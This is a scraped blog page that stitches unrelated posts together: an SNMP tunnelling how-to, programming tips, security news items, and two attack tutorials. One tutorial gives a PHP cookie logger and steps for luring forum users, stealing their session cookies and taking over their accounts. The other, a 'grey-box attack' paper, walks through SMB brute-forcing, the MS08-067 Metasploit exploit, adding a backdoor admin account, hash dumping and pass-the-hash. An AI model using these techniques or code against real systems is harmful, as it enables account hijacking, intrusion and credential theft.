Many monitoring softwares like EM7, Nagios need SNMP service running on servers to be monitored. However administrator or security admin never want to make SNMP running on their production servers because of Security issues. Here is workaround for this issue. We will run SNMP through SSH (encrypted) channel and will make it secured.


We will be using few terms here:



1. Producer: The Server which you want to Monitor running net-snmp

2. Proxy: Accessible to Both to Monitoring Server (MS) and to the Producer. Proxy machine will be in local network of MS.


3. MS: Monitoring Server


Prerequisites:


socat should be installed on

Scenario:

I want to monitor my Personal System from MS. I have setup Firewall to access my system. In that Only port 22 is open. You cannot access SNMP running on my personal system directly. So I have setup one Proxy Machine i.e. ABC which is accessible to MS and you can access my machine from ABC also.

Proxy Machine: ABC 10.0.0.1


On Proxy Machine:

ssh -f -N root@ -L 6004:localhost:6004


Start TCP to UDP socat on Producer:

socat -d -d -d -lffoo.log TCP4-LISTEN:6004,fork UDP4:localhost:161


Start UDP to TCP socat on Proxy:

socat -d -d -d -lffoo.log UDP4-LISTEN:161,fork TCP:localhost:6004


Test by running snmpwalk on Proxy Machine:

snmpwalk -v1 -c public localhost
Now use port 161 of Proxy machine to access SNMP data of Producer and start monitoring it.


reference:linuxforums

• Stumble This!
• Mark as Delicious!
• Bookmark on Facebook!
• Tweet This!

Join an online programming community

There are a lot of online programming communities that you can join that will help you improve your programming ability. These communities have the latest programming news, articles and howtos, and forums. Keeping up with the news will help you stay with the times. Reading the articles and howtos will improve your programming skill. The forums are always a great way to not only get help but to help other people and learn things you didn't know in the process.
Work on an open source project

It is a good idea to work on an open source project because you will get to be part of the development of a real program. You are not only learning while you are doing your own coding but you are learning from the code of the other programmers.
Do personal projects

If you would rather work on a project by yourself then that is also a great way to learn. You need to make sure that you try something that is very different to what you have programmed before to get the most benefit. The best thing about working on personal projects is that you are free to use the latest technologies and learn all about them.
Read programming books

The Internet has so much information about programming that it seems as if books are now useless but that is definately not true. Books go into things in a lot more detail and the more details you learn about something the better you will be at it. You can also carry a book around with you which you can't always do with a computer.
Program in another language or field

It is nice to have a good knowledge of one programming language but the popularity of programming languages seems to change so quickly. You need to be prepared for new programming languages otherwise you might not be able to program very much in the future. Other programming languages will also make you look at the way that you program in languages you already know in a different way. If you have mostly only made accounting programs then it means that you will have a hard time programming other types of software. You need to learn about how programs are made in different industry fields so that you get new ideas and learn new ways to program.
Learn about non-programming things

The interesting thing about programming is that you get the chance to learn about all the different industries that are not related to IT. The downside of this is that you have to learn about a new industry every time you work on a new program. If you think ahead and learn about all the different industries then you will prepare yourself for when you have to program for another industry. Learning about things that are not related to programming can also give you new ideas on how to solve programming problems.
Refresh your knowledge

When you haven't worked with a programming language or technology for a while then you forget a lot about it. You need to hold on to your previous knowledge by practicing things that you have learnt in the past.

Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Google, Yahoo, Orkut, Facebook, Flickr etc.

What is a CookieLogger?

A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.

Today I am going to show How to make your own Cookie Logger…Hope you will enjoy Reading it …

Step 1: Save the notepad file from the link below and Rename it as Fun.gif:

Download it here.

Step 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php:

$filename = “logfile.txt”;
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ‘a’))
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
else
{
if (fwrite($handle, “\r\n” . $_GET["cookie"]) === FALSE)
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
fclose($handle);
exit;
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
?>

Step 3: Create a new Notepad File and Save it as logfile.txt

Step 4: Upload this file to your server

cookielogger.php -> http://www.yoursite.com/cookielogger.php
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
fun.gif -> http://www.yoursite.com/fun.gif

If you don’t have any Website then you can use the following Website to get a Free Website which has php support :

http://0fees.net

Step 5: Go to the victim forum and insert this code in the signature or a post :

Download it here.

Step 6: When the victim see the post he view the image u uploaded but when he click the image he has a Temporary Error and you will get his cookie in log.txt . The Cookie Would Look as Follows:

phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6% ​3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9

Step 7: To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.

Step 8: Goto the Website whose Account you have just hacked and You will find that you are logged in as the Victim and now you can change the victim’s account information.

Note: Make Sure that from Step 6 to 8 the Victim should be Online because you are actually Hijacking the Victim’s Session So if the Victim clicks on Logout you will also Logout automatically but once you have changed the password then you can again login with the new password and the victim would not be able to login.

Disclaimer: I don’t take Responsibility for what you do with this script, served for Educational purpose only.

I DIDN'T WRITE THIS, FOR ANYONE WHO THOUGHT I DID,
JUST CONTRIBUTING.

reference:hackforums..

A high-profile hack of a Twitter employee's e-mail and Google Apps accounts tops our news this week, in part because the whole saga offers a reminder about the need for strong passwords and exercising caution about what personal information is posted at social-networking sites, especially if, say, that information gives clues to your passwords. Elsewhere in security news, or perhaps we should say just about everywhere in security news, the search spread worldwide for the source of the massive denial-of-service attacks earlier this month.

1. Hacker break-in of Twitter e-mail yields secret docs, Twitter/Google Apps hack raises questions about cloud security and Possible Twitter lawsuit would dive into murky blog waters: A hacker got into a Twitter employee's e-mail account and stole confidential documents about a month ago, raising concerns about cloud-computing security and leading to another round of warnings about the need for strong passwords and the pitfalls of posting personal information on social-networking sites, among other things. The hacker used information obtained from the administrative assistant's e-mail account to access the employee's Google Apps account. In a further twist, the hacker offered the confidential documents to some bloggers and online sites, prompting Twitter cofounder Biz Stone to threaten legal action against those who publish the information.

2. Cyberattack probe goes global: British authorities are investigating the cyberattacks earlier this month that brought down prominent Web sites in the U.S., including government sites, and in South Korea. Security researchers traced the master command-and-control server used in the denial-of-service attacks to the U.K., but the master server apparently was located in Miami.

3. Reports: Microsoft and Yahoo close to search ad deal: The story that refuses to die reared its head again this week with reports that Microsoft and Yahoo are close to a search ad deal that could happen in less than a week. If it does, we will fill you in on the details next week and then hope to never have to speak of the matter again.

4. Wall Street Beat: IT investors eye bellwether financials: Various IT bellwethers reported quarterly financials this week, with some encouraging signs that tech spending has bottomed out and will begin to climb out of the rut it has been in as the second half of the year progresses.

5. Analysts see alarming development in mobile malware: Mobile botnets are surely on the horizon, with the first worm that spread on mobile devices via spam text messages the harbinger, says one security vendor.

6. Sun shareholders give nod to Oracle deal: Sun shareholders approved the company's acquisition by Oracle, but the voting margin in favor of the deal was "surprisingly low" in the opinion of Dan Olds, an analyst with Gabriel Consulting Group.

7. China's Internet users outnumber U.S. population: China had 338 million Internet users at the end of June -- more than the U.S. population, which stands at just shy of 307 million. More people in China are using e-commerce and accessing the Web using mobile phones than previously, and overall Internet use there is the highest of any country, according to the China Internet Network Information Center.

8. Survey says most companies won't deploy Windows 7: Almost six in 10 companies have no current plans to move to Microsoft's Windows 7, which is supposed to be out in October, according to a survey published by ScriptLogic, which makes software tools for the Windows OS.

9. Spam: Still a shopper's paradise: For those of us who remain mystified about why it is that spam messages purporting to sell products keep rolling into our inboxes -- who in the world clicks on those links? -- the Messaging Anti-Abuse Working Group supplied some answers. Twelve percent of respondents to a recent survey said they bought something that way, and that apparently is a high enough percentage to make spam a lucrative venture. As Ian Paul says at the outset of his column about the survey -- "All right. Listen up people: We have a problem."

10. 10 gifts from Apollo and Apollo's 40th anniversary shows true wonder of the Internet: We end this week's Top 10 with a Network World slide show that looks at 10 technologies brought to us by NASA's Apollo 11 project that landed men on the moon 40 years ago on July 20. "And today, through the true magic of the Internet, we are able to again see, hear and experience a second-by-second re-enactment of that spectacular event and relive it right on our computer screens," Todd Weiss marvels in his PC World column.

reference:http://www.packetstormsecurity.org/,http://www.pcworld.com/businesscenter/article/168640/another_highprofile_hack_ddos_probe_goes_global.html

A handful of Portland Web sites became the unsuspecting targets of Turkish hackers over the weekend.

The home page of the Central Northeast Neighbors was replaced by a message claiming the site had been cracked by a Turkish hacker. Five other sites were also hit.

"We're a small community non-profit so it's kind of odd he would choose us," said Sandra Lefrancois, community program director.

Todd Coward, the owner of the company that hosts and services the sites, said the hacker simply erased the homepage and replaced it with his own.

Coward keeps all the files and data on private servers. He hosts more than 30 sites but only a handful were hacked. He said there's no way of knowing who is really responsible.

"I suspect he's in Turkey, (but) I don't know where he is," Coward said. "I think these people do this just to show he can do it."

Central Northeast neighbors were left wondering why they became the victims of an online hijacking.

"People don't really understand what this is all about," Lefrancois said. "Is it dangerous? Is it hurting something? Is it ruining my computer? Even somebody just looking at the site, there's kind of an aura of fear there."

LeFrancois said she hopes the hacking doesn't keep people away from the sites.

"The thing is, they may not come back to the site," she said. "We want people to repeatedly come back."

A Google search Wednesday showed numerous sites claiming to be hacked. All sites were running as normal by Wednesday night.

reference:http://www.packetstormsecurity.org/,http://www.kxl.com/ArticlePage/itemid/18048/Portland-sites-hacked-by-Turkish-hackers/

|=--------------------------------------------------------------------=|
|=-----------------=[ The Art of Grey-Box Attack ]=-------------------=|
|=--------------------------=[ 4 July 2009 ]=-------------------------=|
|=----------------------=[ By CWH Underground ]=--------------------=|
|=--------------------------------------------------------------------=|


######
Info
######

Title : The Art of Grey-Box Attack
Author : ZeQ3uL (Prathan Phongthiproek)
JabAv0C (Wiswat Aswamenakul)
Team : CWH Underground [www.milw0rm.com/author/1456]
Website : cwh.citec.us / www.citec.us
Date : 2009-07-04


##########
Contents
##########

[0x00] - Introduction

[0x01] - The Art of Microsoft Windows Attack

[0x01a] - Scanning & Enumeration
[0x01b] - Gaining Access
[0x01c] - Escalating Privilege

[0x02] - The Art of Unix/Linux Attack

[0x02a] - Scanning & Enumeration
[0x02b] - Gaining Access
[0x02c] - Escalating Privilege

[0x03] - Metasploit Ninja-Autopwned

[0x03a] - Nmap+Metasploit Autopwned
[0x03b] - Nessus+Metasploit Autopwned

[0x04] - Client-Side Attack with Metasploit

[0x04a] - Metasploit Payload Generator
[0x04b] - MS-Office Macro Ownage
[0x04c] - AdobeReader PDF Ownage

[0x05] - References

[0x06] - Greetz To


#######################
[0x00] - Introduction
#######################

Hi all, in this paper, we will guide you about methods to hacking into Windows
system and linux system. Moreover, we also show the ways to use popular hacking tools,
nmap and metasploit. Those tools are more powerfull than day in the past (We will see it ;D)

We divide the paper into 7 sections from 0x00 to 0x06. However, only section 0x01 to
0x04 are technical issue. Section 0x01, we show the steps to hack into Windows 2000 operating
system. Section 0x02, we switch to talk about steps of linux hacking. The next section, 0x03,
mentions about automatic exploiting by using metasploit combining with nmap or nessus.
The last technical section lets you see examples of exploiting client software in order to
get access to a system :-D


##############################################
[0x01] - The Art of Microsoft Windows Attack
##############################################

In this section, we talk about attacking Windows machines in network. We will start with scanning
and enumeration then we move to gain access to Windows system and, finally, escalating privilege
in order to control the machine completely and use the machine to attack other machines in the network.


++++++++++++++++++++++++++++++++++
[0x01a] - Scanning & Enumeration
++++++++++++++++++++++++++++++++++

First, start with scanning by using nmap (http://nmap.org) which is the best in our opinion.
New version of nmap improves scanning speed, mappes port with service name and adds custom script feature
which is perfect use for penetration testing.

The first example, We use nmap to scan for openning ports which are the channels to attack the system:

[Nmap Result]-----------------------------------------------------------------------------------

bt nmap-4.85BETA10 # nmap -sV 192.168.80.129

Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:03 GMT
Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap/nmap-services for security and consistency reasons.
set NMAPDIR=. to give priority to files in your local directory (may affect the other data files too).
Interesting ports on 192.168.80.129:
Not shown: 990 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS webserver 5.0
135/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp open netbios-ssn
443/tcp open https?
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
1025/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open msrpc Microsoft Windows RPC
1027/tcp open msrpc Microsoft Windows RPC
1433/tcp open ms-sql-s Microsoft SQL Server 2000 8.00.194; RTM
3372/tcp open msdtc?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=4.85BETA10%I=7%D=7/3%Time=4A4DD777%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"\x18\xc1\n\0x\x01")%r(RTSPRequest,6,"\x18\xc1\n\0x\x01")
SF:%r(HTTPOptions,6,"\x18\xc1\n\0x\x01")%r(Help,6,"\x18\xc1\n\0x\x01")%r(S
SF:SLSessionReq,6,"\x18\xc1\n\0x\x01")%r(FourOhFourRequest,6,"\x18\xc1\n\0
SF:x\x01")%r(LPDString,6,"\x18\xc1\n\0x\x01")%r(SIPOptions,6,"\x18\xc1\n\0
SF:x\x01");
MAC Address: 00:0C:29:CC:CF:46 (VMware)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.68 seconds

[End Result]------------------------------------------------------------------------------------

From result, we get a list of opening ports and we know that this system runs IIS, Netbios, Endpoint Mapper, SMB, MSSQL2000
and the operating system is Windows 2000 (We pick Windows 2000 as the example because we want you to see the big picture of
Windows hacking). The next step is an information gathering from Netbios and SMB. Windows 2000 has "Null Session" vulnerability
(Holygrail of Windows Vulnerability) which allows us to enumerate all accounts in the system including security policies,
local group, file share. We pick nmap to gather the information by using Nmap-script. In the past, We had to connect to the system
through IPC$ (Null Session) then we had run command [net use \\192.168.80.129 "" /u:""] after that we have enumerated the information through
a tool such as Superscan4 or Winfo. Nowadays, Nmap(8.5Beta) can perform those tasks with help of Nmap-script (smb-enum-users, smb-enum-shares,Etc).

[Nmap Result]-----------------------------------------------------------------------------------

bt nmap-4.85BETA10 # nmap --script=smb-enum-users 192.168.80.129

Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:21 GMT
Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap/nmap-services for security and consistency reasons.
set NMAPDIR=. to give priority to files in your local directory (may affect the other data files too).
Interesting ports on 192.168.80.129:
Not shown: 990 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1433/tcp open ms-sql-s
3372/tcp open msdtc
MAC Address: 00:0C:29:CC:CF:46 (VMware)

Host script results:
| smb-enum-users:
|_ SERVER\Administrator, SERVER\backup, SERVER\epp, SERVER\epp_contractor, SERVER\Guest, SERVER\IUSR_SERVER, SERVER\IWAM_SERVER, SERVER\Jim, SERVER\John, SERVER\mary, SERVER\molly, SERVER\None, SERVER\TsInternetUser

Nmap done: 1 IP address (1 host up) scanned in 0.63 seconds

[End Result]------------------------------------------------------------------------------------

From Result, We know all user in target system:

- Administrator
- Backup
- epp
- epp_contractor
- Guest
- IUSR_SERVER
- IWAM_SERVER
- Jim
- John
- mary
- molly
- TsInternetUser

The Others techniques is Enumeration from "LDAP Anonymous" and SNMP Default Community string (Public/Private) that we can list all user from target system too.
"LDAP Anonymous" => Using ldapminer
"Default SNMP Community String" => Using snmpwalk
The shared files and folders are also important. If there is no properly permission setting, attack may directly upload malicious files to the system.

[Nmap Result]-----------------------------------------------------------------------------------

bt nmap-4.85BETA10 # nmap --script=smb-enum-shares 192.168.80.129

Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:21 GMT
Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap/nmap-services for security and consistency reasons.
set NMAPDIR=. to give priority to files in your local directory (may affect the other data files too).
Interesting ports on 192.168.80.129:
Not shown: 990 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1433/tcp open ms-sql-s
3372/tcp open msdtc
MAC Address: 00:0C:29:CC:CF:46 (VMware)

Host script results:
| smb-enum-shares:
| Anonymous shares: IPC$
|_ Restricted shares: COVERPG$, Fax$, Inetpub, scripts, ADMIN$, C$

Nmap done: 1 IP address (1 host up) scanned in 0.49 seconds

[End Result]------------------------------------------------------------------------------------

From Result, We know all share files:
IPC << Anonymous Null Session
COVERPG
Fax
Inetpub
scripts
ADMIN
C


Next, We know all users from Null Session so we can bruteforce attack for their users with Nmap-script "smb-brute"

[Nmap Result]-----------------------------------------------------------------------------------

bt nmap-4.85BETA10 # nmap --script=smb-brute 192.168.80.129

Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:38 GMT
Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap/nmap-services for security and consistency reasons.
set NMAPDIR=. to give priority to files in your local directory (may affect the other data files too).
Interesting ports on 192.168.80.129:
Not shown: 990 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1433/tcp open ms-sql-s
3372/tcp open msdtc
MAC Address: 00:0C:29:CC:CF:46 (VMware)

Host script results:
| smb-brute:
| backup:pukcab => Login was successful
|_ epp:password => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 5.93 seconds

[End Result]------------------------------------------------------------------------------------

Look at that result, We can brute weak password from users backup and epp.



++++++++++++++++++++++++++
[0x01b] - Gaining Access
++++++++++++++++++++++++++


Now we got 2 account credentials for attack, We choose "epp" that use password "password". Use psexec (Pstool from sysinternals)
to spawn command shell back to our.


[Psexec Result]---------------------------------------------------------------------------------
C:\>psexec \\192.168.80.129 -u epp -p password -e cmd.exe

PsExec v1.71 - Execute processes remotely
Copyright (C) 2001-2006 Mark Russinovich
Sysinternals - www.sysinternals.com


Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 192.168.80.129
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.80.2

C:\WINNT\system32>net user

User accounts for \\SERVER

------------------------------------------------------------------------------
Administrator backup epp
epp_contractor Guest IUSR_SERVER
IWAM_SERVER Jim John
mary molly TsInternetUser
The command completed successfully.

[End Result]------------------------------------------------------------------------------------

From Result, We can spawn their command shell with epp's privilege (Administrators) then Blah Blah Blah...

The target use MSSQL 2000, we guess they use default username/password for MSSQL 2000 (SA/blank password).So we use osql to spawn command shell with MSSQL stored procedure
xp_cmdshell, This stored procedure was gold mines for Hacker that use for interactive command shell. Attacker can use 'osql' to get shell from target.

[Osql Result]-----------------------------------------------------------------------------------
C:\>osql -S 192.168.80.129 -U sa -P "" -Q "exec master..xp_cmdshell 'dir c:\' "
output

------------------------------------------------------------------------------

-----------------------------------------------------------------------

-----------------------------------------------------------------------

--------------------------------
Volume in drive C has no label.

Volume Serial Number is 50C0-6A72

NULL

Directory of c:\

NULL

12/03/2004 04:39p 451 dir.txt
06/04/2004 03:49p Documents and Settings
19/03/2009 12:47a Inetpub
19/03/2009 12:38a Program Files
03/07/2009 04:55p WINNT
1 File(s) 451 bytes
4 Dir(s) 3,053,559,808 bytes free

NULL

C:\>osql -S 192.168.80.129 -U sa -P "" -Q "exec master..xp_cmdshell 'net user' "
output

------------------------------------------------------------------------------

-----------------------------------------------------------------------

-----------------------------------------------------------------------

--------------------------------

-----------------------------------------------------------------------------

Administrator backup cwh

epp epp_contractor Guest

IUSR_SERVER IWAM_SERVER Jim

John mary molly

TsInternetUser

or more errors.

NULL

NULL

[End Result]------------------------------------------------------------------------------------

Note: Nmap-script have "ms-sql-info.nse" for scaning machine that use account 'sa' with blank password too.

The Lastest Worm like Conficker/DownADup, Nmap-script can scan for MS08-067 Vulnerability ?? and System Infected Worm ?? with "smb-check-vulns".

[Nmap Result]-----------------------------------------------------------------------------------

bt nmap-4.85BETA10 # nmap --script=smb-check-vulns 192.168.80.129

Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:35 GMT
Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap/nmap-services for security and consistency reasons.
set NMAPDIR=. to give priority to files in your local directory (may affect the other data files too).
Interesting ports on 192.168.80.129:
Not shown: 990 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1433/tcp open ms-sql-s
3372/tcp open msdtc
MAC Address: 00:0C:29:CC:CF:46 (VMware)

Host script results:
| smb-check-vulns:
| MS08-067: VULNERABLE
|_ Conficker: Likely CLEAN

Nmap done: 1 IP address (1 host up) scanned in 1.66 seconds

[End Result]------------------------------------------------------------------------------------

Now we know target has MS08-067 vulnerability, Then use the G0d of Exploit suite => "Metasploit Framework"

[Msf Console]-----------------------------------------------------------------------------------

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show targets
msf exploit(ms08_067_netapi) > set TARGET 1
TARGET => 1
msf exploit(ms08_067_netapi) > set PAYLOAD generic/shell_bind_tcp
PAYLOAD => generic/shell_bind_tcp
msf exploit(ms08_067_netapi) > set RHOST 192.168.80.129
RHOST => 192.168.80.129
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Triggering the vulnerability...
[*] Command shell session 1 opened (192.168.80.131:51038 -> 192.168.80.129:4444)

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig
ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 192.168.80.129
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.80.2

C:\WINNT\system32>net user cwh 1234 /add
net user cwh 1234 /add
The command completed successfully.

C:\WINNT\system32>net localgroup administrators cwh /add
net localgroup administrators cwh /add
The command completed successfully.

C:\WINNT\system32>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator backup cwh
epp epp_contractor Guest
IUSR_SERVER IWAM_SERVER Jim
John mary molly
TsInternetUser
The command completed with one or more errors.

[End Msf]---------------------------------------------------------------------------------------

The Most popular Tools for scanning, enumeration, vulnerability assessment is Nessus (www.www.nessus.org).That have many features like highspeed discovery.
configuration audit, sensitive data discovery and vulnerability analysis. The Best thing, It's FREE !!!


++++++++++++++++++++++++++++++++
[0x01c] - Escalating Privilege
++++++++++++++++++++++++++++++++


The next step to do is Dump SAM file from target that get all hashing. Sure we can use Nmap !!
We can read the information in SAM file only when we have administrator's privilege (epp's account had administrators group)

[Nmap Result]-----------------------------------------------------------------------------------

bt nmap-4.85BETA10 # nmap --script=smb-pwdump --script-args=smbuser=epp,smbpass=password 192.168.80.129

Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:50 GMT
Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap/nmap-services for security and consistency reasons.
set NMAPDIR=. to give priority to files in your local directory (may affect the other data files too).
Interesting ports on 192.168.80.129:
Not shown: 990 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1433/tcp open ms-sql-s
3372/tcp open msdtc
MAC Address: 00:0C:29:CC:CF:46 (VMware)

Host script results:
| smb-pwdump:
| Administrator:1010 => F703F386322B0662E72C57EF50F76A05:C62638B38308E651B21A0F2CCAB3AC9B
| backup:1005 => E84F09BA27610849AAD3B435B51404EE:94FF50F81F9885648A05438F63EA9F91
| epp:500 => E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C
| epp_contractor:1007 => 60F898DDDCAE534EAAD3B435B51404EE:148301D12E96ED2CE24A20C6ED9A2EAF
| Guest:501 => A0E150C75A17008EAAD3B435B51404EE:823893ADFAD2CDA6E1A414F3EBDF58F7
| IUSR_SERVER:1001 => 0C2A09C60FF052D3518640B5D8EB223A:E9C4226B18D023A932473576E62EB5E9
| IWAM_SERVER:1002 => A373B0BEBCEED1FAD95379C32DAD5DEF:803F59A7EA1EA9A65A15310B58A015D3
| Jim:1009 => 209CA2D6E74286E9AAD3B435B51404EE:FF623167AECD14984A0A97E4D3989A89
| John:1004 => 4B69911850133174AAD3B435B51404EE:D5173C778E0F56D9FC47E3B3C829ACA7
| mary:1003 => 879980DE48006E7EAAD3B435B51404EE:BA69764BCCF8F41121E0B3046CE46C67
| molly:1008 => 4B69911850133174AAD3B435B51404EE:D5173C778E0F56D9FC47E3B3C829ACA7
|_ TsInternetUser:1000 => 52FE1A30EB33BA7BE3BB722E78963414:3A07E408DB9CB2331C9C527B0F4A8C52

Nmap done: 1 IP address (1 host up) scanned in 2.58 seconds

[End Result]------------------------------------------------------------------------------------

Now we got all hash from target system. In the past, Need to crack password by using a tool such as cain or rcrack
with a technique called "rainbow tables" but this action steal sleeping time from us. We can save that time by one of nmap features.
Nmap can try to login to other machines with gathering hashes and list of usernames. We do not need to pre-crack the hashes.

[Nmap Result]-----------------------------------------------------------------------------------

bt nmap-4.85BETA10 # cat password.txt
F703F386322B0662E72C57EF50F76A05
E52CAC67419A9A224A3B108F3FA6CB6D
209CA2D6E74286E9AAD3B435B51404EE
bt nmap-4.85BETA10 # nmap --script=smb-brute --script-args=userdb=usernames.txt,passdb=password.txt 192.168.80.1/24

Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:50 GMT
Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap/nmap-services for security and consistency reasons.
set NMAPDIR=. to give priority to files in your local directory (may affect the other data files too).
Interesting ports on 192.168.80.100:
PORT STATE SERVICE
445/tcp open microsoft-ds

Host script results:
| smb-brute:
|_ Administrator:F703F386322B0662E72C57EF50F76A05 => Login was successful

Interesting ports on 192.168.80.135:
PORT STATE SERVICE
445/tcp open microsoft-ds

Host script results:
| smb-brute:
| epp:E52CAC67419A9A224A3B108F3FA6CB6D => Login was successful
|_ Jim:209CA2D6E74286E9AAD3B435B51404EE => Login was successful


[End Result]------------------------------------------------------------------------------------


Now we can compromise other system from network that use the same password (Hashing with no-crack), Use Passing the Hash with SMB suite (http://foofus.net/jmk/passhash.html)
to impersonating user without password. I use samba-3.0.22 with patched:

./configure --with-smbmount
patch -p0 patch -p0
[SMB Hash]--------------------------------------------------------------------------------------

bt cwh # export SMBHASH="F703F386322B0662E72C57EF50F76A05:C62638B38308E651B21A0F2CCAB3AC9B"
bt cwh # ./smbmount //192.168.80.129/c$ /mnt/passhash -o username=administrator
Password: << Insert hash from SMBHASH (F703F386322B0662E72C57EF50F76A05:C62638B38308E651B21A0F2CCAB3AC9B)
HASH PASS: Substituting user supplied NTLM HASH...
HASH PASS: Substituting user supplied NTLM HASH...
HASH PASS: Substituting user supplied LM HASH...
bt cwh # ls /mnt/passhash/
dir.txt Documents and Settings Inetpub Program Files WINNT
bt cwh #

[End Result]------------------------------------------------------------------------------------

Other tool is pass-the-hash Toolkit (http://oss.coresecurity.com/projects/pshtoolkit.html) to impersonating user without password. The Pass-The-Hash Toolkit contains utilities to manipulate the Windows Logon Sessions
mantained by the LSA (Local Security Authority) component. These tools allow you to list the current logon sessions with its corresponding NTLM credentials (e.g.: users remotely logged in thru Remote Desktop/Terminal Services),
and also change in runtime the current username, domain name, and NTLM hashes (YES, PASS-THE-HASH on Windows!).

We need to compromise one machine for attack other machine that use the same credentials, Now we got their command shell and use "whosthere" for find their credentials.

[Victim Result]---------------------------------------------------------------------------------

C:\pshtoolkit_v1.4\whosthere>whosthere
WHOSTHERE v1.4 - by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security Technologies
This tool lists the active LSA logon sessions with NTLM credentials.
(use -h for help).
-B is now used by default. Trying to find correct addresses..Found!.
the output format is: username:domain:lmhash:nthash

cwh:SERVER:00000000000000000000000000000000:8846F7EAEE8FB117AD06BDD830B7586C
Administrator:SERVER2:209CA2D6E74286E9AAD3B435B51404EE:BA69764BCCF8F41121E0B3046CE46C67

C:\pshtoolkit_v1.4\whosthere>cd ..\iam
C:\pshtoolkit_v1.4\iam>iam.exe -r cmd.exe -h Administrator:SERVER2:209CA2D6E74286E9AAD3B435B51404EE:BA69764BCCF8F41121E0B3046CE46C67 -B
IAM v1.4 - by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security Technologies
Parameters:
Username: Administrator
Domainname: SERVER2
LM hash: 209CA2D6E74286E9AAD3B435B51404EE
NT hash: BA69764BCCF8F41121E0B3046CE46C67
Run: cmd.exe
LSASRV.DLL version: 00050001h. A280DC0h
Checking LSASRV.DLL....skipped. (-B was specified).
Trying to obtain addresses...Ok! (AC = 75753BA0, EM = 7573FDEC)
The current logon credentials were successful changed!

[End Result]------------------------------------------------------------------------------------

Now we have Administrator credential in the new MS-dos that Maybe can compromise many machine in network !!



#######################################
